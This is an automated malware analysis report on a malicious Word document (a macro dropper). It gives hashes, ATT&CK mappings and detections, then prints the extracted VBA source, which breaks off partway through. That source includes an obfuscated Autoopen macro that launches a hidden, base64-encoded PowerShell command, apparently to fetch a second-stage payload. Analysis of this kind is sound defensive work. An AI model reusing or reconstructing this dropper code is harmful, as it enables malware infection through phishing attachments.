Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5839dfa1dfe2b374…

MALICIOUS

Office (OLE)

Size: 106.0 KB
Created: 2018-05-29 08:42:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 73afebeda7ee0aa0d925ed785c1a7252
SHA-1: 22b0ef9264db7c4f245e6223034b8811d54fc98d
SHA-256: 5839dfa1dfe2b37425b2d9d1877d3d2e2c8867c900181a486e924252fc5e0cf6
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an Autoopen subroutine that calls the Shell function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The presence of the Autoopen macro and the Shell() call strongly indicate a malicious dropper.

Heuristics (7 findings)

  • ClamAV: Doc.Dropper.Agent-6579427-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6579427-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14725 bytes
SHA-256: 681ae6fbe56cbc9b163061c835f988dd4a9afa216a0d7529fcb1b8e63c40451e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "TGpQjhmKuRiDMW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function shDnvr()
On Error Resume Next
chJRpr = Fix(13280 / CSng(86170) * JbTls * CsCVKi)
VhBn = CDate(53633)
irHKDp = Fix(31717 / CSng(73873) * EjOBa * BEQjf)
VhBn = CDate(27516)
shDnvr = LLprEIj + oVVjmQcZTZT + JriuvwHa + OXKjOXpWiH + wTIZsbJiGnR + qMLFjDLY + jjYXPt
rVisE = Fix(71551 / CSng(41257) * GRAiia * hCDoWL)
VhBn = CDate(28920)
End Function
Sub Autoopen()
On Error Resume Next
dwcrA = Fix(31452 / CSng(88462) * wkEzmb * lfQWz)
VhBn = CDate(35241)
BjJpO (shDnvr)
TvaTX = Fix(26730 / CSng(55814) * rOcTEv * tVdMSE)
VhBn = CDate(95523)
End Sub
Function BjJpO(LTzRTSUss)
On Error Resume Next
awFrR = Fix(18046 / CSng(11098) * RjQdjQ * sjVGtq)
VhBn = CDate(42895)
vjjPuEinUt = josFouP + Shell(UbzITTBzu + Chr(vbKeyP) + wSPVilij + LTzRTSUss, vbHide)
XPJlv = Fix(86006 / CSng(70942) * JVVAXR * LhlYL)
VhBn = CDate(69279)
End Function


Attribute VB_Name = "RvdokjzzEjEdi"
Function LLprEIj()
On Error Resume Next
tdJduZ = Fix(23218 / CSng(41058) * hBjFq * hamRv)
VhBn = CDate(39378)
UtzRz = "owersHeLL -WinD" + "owsTyle h" + "idden -" + "e JgAoACAA" + "JABlAG4AVgA" + "6AEMATw" + "BNAFMAUABFAEMAW"
kHnta = Fix(6429 / CSng(67245) * HndCbt * TzUzMa)
VhBn = CDate(82328)
izMOPRTXU = "wA0ACw" + "AMgA0ACwAMgA1" + "AF0ALQBKAE8ASQ" + "BOACcAJwApACg"
vrvDO = Fix(78446 / CSng(62020) * KGbtBq * wImKa)
VhBn = CDate(27508)
wWLKMzoHiB = "AIAAoACgAIgB7" + "ADEANwB9AHsA" + "NwA2AH0AewAxAD" + "AAMgB9AHs"
DOMuG = Fix(75903 / CSng(94900) * HrtzrC * AUEbAS)
VhBn = CDate(91373)
IQCjArhXjP = "AMQAwADcAfQB" + "7ADcANwB9AHsA" + "MQAyADgAfQB7" + "ADMAOQB" + "9AHsAMQA" + "wADgAfQB7A" + "DEAMAAzAH" + "0AewA" + "xADEAOAB9AHsAOQ" + "B9AHsAMQAw"
AlcwVo = Fix(50566 / CSng(30764) * trnjr * hspNz)
VhBn = CDate(70545)
aakkOojJIzi = "ADEAfQB7ADQAfQ" + "B7ADEAMQ" + "AxAH0Aew" + "AxAH0" + "AewA4" + "ADAAfQB7ADcAOA"
BwwSIS = Fix(11264 / CSng(96956) * lHOMI * obIhbd)
VhBn = CDate(12107)
MBzcB = "B9AHsAN" + "wB9AHsANQ" + "A3AH0AewA4" + "ADgAfQB7ADEA" + "MAA1AH0" + "AewA0A" + "DUAfQB7AD" + "EAMwA1A" + "H0AewA1AD"
OzIzW = Fix(67063 / CSng(20820) * wPAjd * CjIKS)
VhBn = CDate(60926)
ARoTM = "MAfQB7ADYAOQB9A" + "HsAMwB9AHsA" + "NAA3AH0AewA" + "yADIAf" + "QB7ADYAMQB9" + "AHsAMQAyADQAfQB"
jRiLD = Fix(7347 / CSng(26972) * RJWvw * TzSjPD)
VhBn = CDate(62111)
HtLQXOW = "7ADAAfQ" + "B7ADcAMwB9AH" + "sAMwA1AH0Aew" + "AxADIAMwB9AHsA"
zLYBo = Fix(47211 / CSng(54621) * RKati * inTfwz)
VhBn = CDate(59466)
GiASUu = "MQA4A" + "H0AewAz" + "ADIAf" + "QB7ADEAMwA" + "wAH0AewA5" + "ADgAfQB7AD" + "YAOAB9AHs" + "ANAA5AH0" + "AewAyADcAfQB7AD" + "UAOQB9AHsAMQA"
LLprEIj = UtzRz + izMOPRTXU + wWLKMzoHiB + IQCjArhXjP + aakkOojJIzi + MBzcB + ARoTM + HtLQXOW + GiASUu
End Function
Function oVVjmQcZTZT()
On Error Resume Next
ioiRj = Fix(62365 / CSng(80050) * CcaUST * CPpcss)
VhBn = CDate(22501)
tqqodnfz = "yADcAfQB7ADcAN" + "QB9AHsAOQAyA" + "H0AewA" + "2AH0AewAxADA" + "AMAB9" + "AHsAMgAxAH" + "0AewAxAD" + "IAOQB9A" + "HsAOQA" + "wAH0Ae"
FAmVi = Fix(31108 / CSng(70176) * jjthk * Xpvjq)
VhBn = CDate(15248)
rPnGiwtXXj = "wAxADMAOAB" + "9AHsAMwA2" + "AH0AewAxA" + "DIAMAB9AHsANQ" + "AwAH0AewA" + "4ADUAfQB7ADEAM" + "wAxAH0AewA4AH0" + "AewA5ADUAfQB7A"
TNOLAR = Fix(30340 / CSng(14093) * mNSTZ * wKLKS)
VhBn = CDate(42718)
ciqDpDw = "DEAOQB9A" + "HsAMgA5AH0" + "AewAxADEANw" + "B9AHsAOAAzAH" + "0AewAzADcAf" + "QB7ADUA" + "fQB7A" + "DcAMgB9AHsA" + "OQA3AH" + "0AewAxADEANQB9A"
oZlCfr = Fix(242 / CSng(62572) * CDWmm * KdzUz)
VhBn = CDate(17025)
pKcjQIJY = "HsAMQ" + "AxADQA" + "fQB7ADIANQB9AH" + "sANQA2AH0AewAx" + "ADEAMgB9A" + "HsAMQAzADI" + "AfQB7ADEAM" + "QB9AHsA" + "OAA3AH0Aew"
jPRzGs = Fix(71149 / CSng(47518) * pbZZpZ * lXHqiL)
VhBn = CDate(28276)
YNmNrXCXFuz = "A2ADcAfQB7ADEAM" + "AA5AH0" + "AewA5A" + "DYAfQB7ADEAM" + "QA2AH" + "0AewA0ADEA" + "fQB7ADkAOQ" + "B
... (truncated)